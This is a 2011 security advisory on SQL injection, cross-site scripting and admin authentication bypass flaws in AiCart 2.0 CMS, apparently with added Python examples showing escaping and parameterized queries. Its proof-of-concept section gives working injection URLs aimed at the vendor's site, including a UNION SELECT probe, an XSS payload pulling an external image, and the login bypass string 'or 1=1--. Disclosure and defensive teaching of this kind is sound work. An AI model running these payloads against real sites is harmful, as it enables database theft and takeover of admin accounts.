AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities
Document Title:
===============
AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities



Release Date:
=============
2011-06-21


Vulnerability Laboratory ID (VL-ID):
====================================
203


Product & Service Introduction:
===============================
AiCart shopping cart software is written in PHP and uses a simple template structure, which makes it very flexible and 
easy to modify. The data in AiCart is stored in a MySQL database. AiCart is fully W3C-compliant with a CSS-based layout.
AiCart features a built-in Content Management System giving you the ability to easily manage and create unlimited web site 
pages with an easy to use online text editor. Best of all, AiCart is search engine friendly. A merchant can specify meta 
tags for all pages, and product and category pages are all stored using the relevant meta data, which results in higher 
search engine rankings. AiWood Digital also offers custom programming services. Every client can get a storefront with 
a unique look fully customized to completely fit the style, image and structure of your business. AiCart is fully 
compatible with PayPal and also features its own store merchant (credit card processing requires an SSL certificate for 
maximum security) as well as having the option to process offline payments.

(Copy of the Vendor Homepage: http://www.aicart.ca/home)



Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple SQL Injection & Cross Site Scripting Vulnerabilities on AiCart CMS v2.0.


Vulnerability Disclosure Timeline:
==================================
2011-06-20:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
Multiple SQL Injection Vulnerabilities are detected in the new AiCart Shopping CMS v2.0.
The vulnerability allows a remote attacker (pre-auth) to inject their own SQL statements into the application's DBMS.

Vulnerable Module(s):
				[+] Add to Cart (Shop)
				[+] Sortby
				[+] TYPE_ID
				[+] ID



--- SQL Error Logs ---
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near  Limit 24, 24 at line 4
SQL Data: SELECT * from products WHERE bid = 2 AND status = 1 ORDER BY -1 Limit 24, 24
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near  order by 1--, NOW()) at line 1
SQL Data: INSERT into basket (cartid, uid, pid, quantity, date) values (5669fc809f48dff557fb50bee3ab472d-1308462112,
2, 2, order by 1--, NOW()) 
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for 
the right syntax to use near at line 1
SQL Data: SELECT * from product_brands WHERE lname = -1;
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50


SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near , NOW()) at line 1
SQL Data: INSERT into basket (cartid, pid, quantity, date) values (38314720c60f05f218b581bad46caed0-1308461139, 2, -1, NOW())
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43 


1.2
A persistent Input Validation Vulnerability is detected in the ajax module, in the pager parameter request.
The vulnerability allows a remote attacker to implant malicious persistent script code on the application side.
Successful exploitation of the bug allows an attacker to hijack admin/customer sessions (accounts) or 
can lead to context request manipulation.

Vulnerable Module(s):
				[+] Ajax - Pager
				[+] Credit Name
				[+] Rating
				[+] Search
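The search and pager issues above are reflected/persistent markup injection: the supplied value lands in HTML without encoding. As an added example (not code from the advisory or from AiCart), the following models the search box in Python, rendering the user's query into an input's value attribute once raw and once through html.escape, and then parses both outputs to show that only the raw version yields an extra element. The attribute name, the markup shape, and the payload URL are assumptions; the payload itself follows the pattern of the advisory's XSS reference (a leading double quote that closes the attribute).

```python
import html
from html.parser import HTMLParser


def render_search_vulnerable(query: str) -> str:
    # Raw interpolation into a quoted attribute: a leading double quote in the
    # query terminates the attribute, and the remainder is parsed as markup.
    # (Assumed markup shape, not AiCart's actual template.)
    return f'<input type="text" name="searchstring" value="{query}">'


def render_search_safe(query: str) -> str:
    # html.escape(quote=True) encodes & < > " and ', so the query can no longer
    # close the attribute regardless of its content.
    return (
        '<input type="text" name="searchstring" '
        f'value="{html.escape(query, quote=True)}">'
    )


class _ElementCollector(HTMLParser):
    """Collects (tag, attributes) for every start tag in a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.elements: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, dict(attrs)))


def parse_elements(markup: str) -> list[tuple[str, dict]]:
    # Parse the rendered fragment the way a browser roughly would; attribute
    # values come back unescaped, so a correctly encoded value round-trips.
    parser = _ElementCollector()
    parser.feed(markup)
    parser.close()
    return parser.elements


# Constructed payload mirroring the advisory's pattern: close the attribute,
# then append an <img> element. The host is a placeholder, not the real one.
CONSTRUCTED_PAYLOAD = '"><img src="http://example.invalid/injection.jpg">'


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable),
                         ("safe", render_search_safe)):
        tags = [tag for tag, _ in parse_elements(render(CONSTRUCTED_PAYLOAD))]
        print(f"{name}: elements = {tags}")
```

The check to carry into a code review is the second assertion in the parsed output: with encoding in place the browser still sees exactly one `input` element, and its `value` attribute decodes back to the original query, so nothing the user typed has changed the document structure.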


1.3
An Auth Bypass Vulnerability is detected in the admin login form of the AiCart Admin Interface.
The bug allows an attacker to bypass authentication to the admin panel.
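Sections 1.1 and 1.3 share one root cause: the error logs show request values (sortby, type_id, the login email) spliced directly into SQL text. As an added example that is not code from the advisory or from AiCart, the following Python models the `users_admin` login query from the auth-bypass error log with string concatenation beside a parameterized version, and models the product listing's `ORDER BY` with an allow-list, since ORDER BY columns cannot be bound as parameters. The schema, column names beyond those visible in the logs, the MD5 password hashing (inferred only from the 32-character hash in the log), and the sample rows are all constructed assumptions.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory schema mirroring table names from the advisory's
    # error logs; the extra columns and rows are assumptions for the demo.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_admin (email TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users_admin VALUES (?, ?)",
        ("admin@example.test", _pw_hash("secret-pw")),
    )
    conn.execute(
        "CREATE TABLE products (pid INTEGER, bid INTEGER, status INTEGER, price REAL)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [(1, 2, 1, 9.5), (2, 2, 1, 3.0), (3, 2, 0, 7.25)],
    )
    return conn


def _pw_hash(password: str) -> str:
    # MD5 only to match the hash length seen in the advisory's log; it is not
    # the subject of this example and not a recommendation.
    return hashlib.md5(password.encode()).hexdigest()


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> bool:
    # The pattern the log reveals: the email value becomes part of the SQL
    # text, so a quote in it rewrites the WHERE clause.
    sql = (
        f"SELECT * from users_admin where email = '{email}' "
        f"AND password = '{_pw_hash(password)}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> bool:
    # Bound parameters: the driver sends the email as a value, never as SQL,
    # so it is compared literally against the column.
    row = conn.execute(
        "SELECT * FROM users_admin WHERE email = ? AND password = ?",
        (email, _pw_hash(password)),
    ).fetchone()
    return row is not None


# ORDER BY cannot take a bound parameter, so the sort key must be mapped from
# the request value to a fixed column name; anything else is rejected.
SORT_COLUMNS = {"price": "price", "pid": "pid"}


def list_products_safe(conn: sqlite3.Connection, bid: int, sortby: str,
                       page: int, per_page: int = 24) -> list:
    column = SORT_COLUMNS.get(sortby)
    if column is None:
        raise ValueError(f"unsupported sortby value: {sortby!r}")
    if not isinstance(page, int) or page < 0:
        raise ValueError(f"invalid page: {page!r}")
    sql = (
        f"SELECT pid FROM products WHERE bid = ? AND status = 1 "
        f"ORDER BY {column} LIMIT ? OFFSET ?"
    )
    rows = conn.execute(sql, (bid, per_page, page * per_page)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    probe = "' or 1=1--"  # the string from the advisory's auth-bypass section
    print("concatenated login accepts probe:", login_vulnerable(db, probe, "x"))
    print("parameterized login accepts probe:", login_safe(db, probe, "x"))
    print("sorted by price:", list_products_safe(db, 2, "price", 0))
```

The sortby allow-list is the part most often missed when a code base is converted to prepared statements: the `ORDER BY -1` line in the advisory's first error log shows exactly that gap, a query whose values may be bound while the sort expression is still built from the request.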


Pictures:
				../1.png
				../1.jpg
				../2.jpg
				../3.jpg
				../4.jpg
				../5.jpg
				../6.jpg


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. For demonstration or to reproduce ...

1.1
SQL Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=1&sortby=-1%27&where_id=&type_id=Nikon
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=0&sortby=&where_id=&type_id=-1%27
http://www.aicart.ca/store?action=orders&id=-3+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

1.2
XSS Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=reviews&page=0&sortby=&where_id=pid%20=%202&pager_id=
http://www.aicart.ca/search?searchstring=%22%3E%3Cimg%20src=%22http://gallery.7bna.com/data/media/50/injection.jpg%22%3E&x=0&y=0


1.3
Auth Bypass:
http://www.aicart.ca/v3/admin/SQL%20Error:%20You%20have%20an%20error%20in%20your%20SQL%20syntax;%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20'8ce3f2de6a1e527b7e2b0c81807743e9''%20at%20line%201%3Cbr%20/%3ESQL%20Data:%20SELECT%20*%20from%20users_admin%20where%20email%20=%20''%20or%201=1--'%20AND%20password%20=%20'8ce3f2de6a1e527b7e2b0c81807743e9'%3Cbr%20/%3EFile:%20/home/aicart/public_html/v3/includes/class.sql_db.php%3Cbr%20/%3ELine:%20500/admin

String: 'or 1=1--


Security Risk:
==============
1.1
The security risk of the multiple SQL injection vulnerabilities is estimated as critical.
1.2
The security risk of the multiple cross site scripting vulnerabilities is estimated as medium.
1.3
The security risk of the auth bypass vulnerability is estimated as critical.



Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory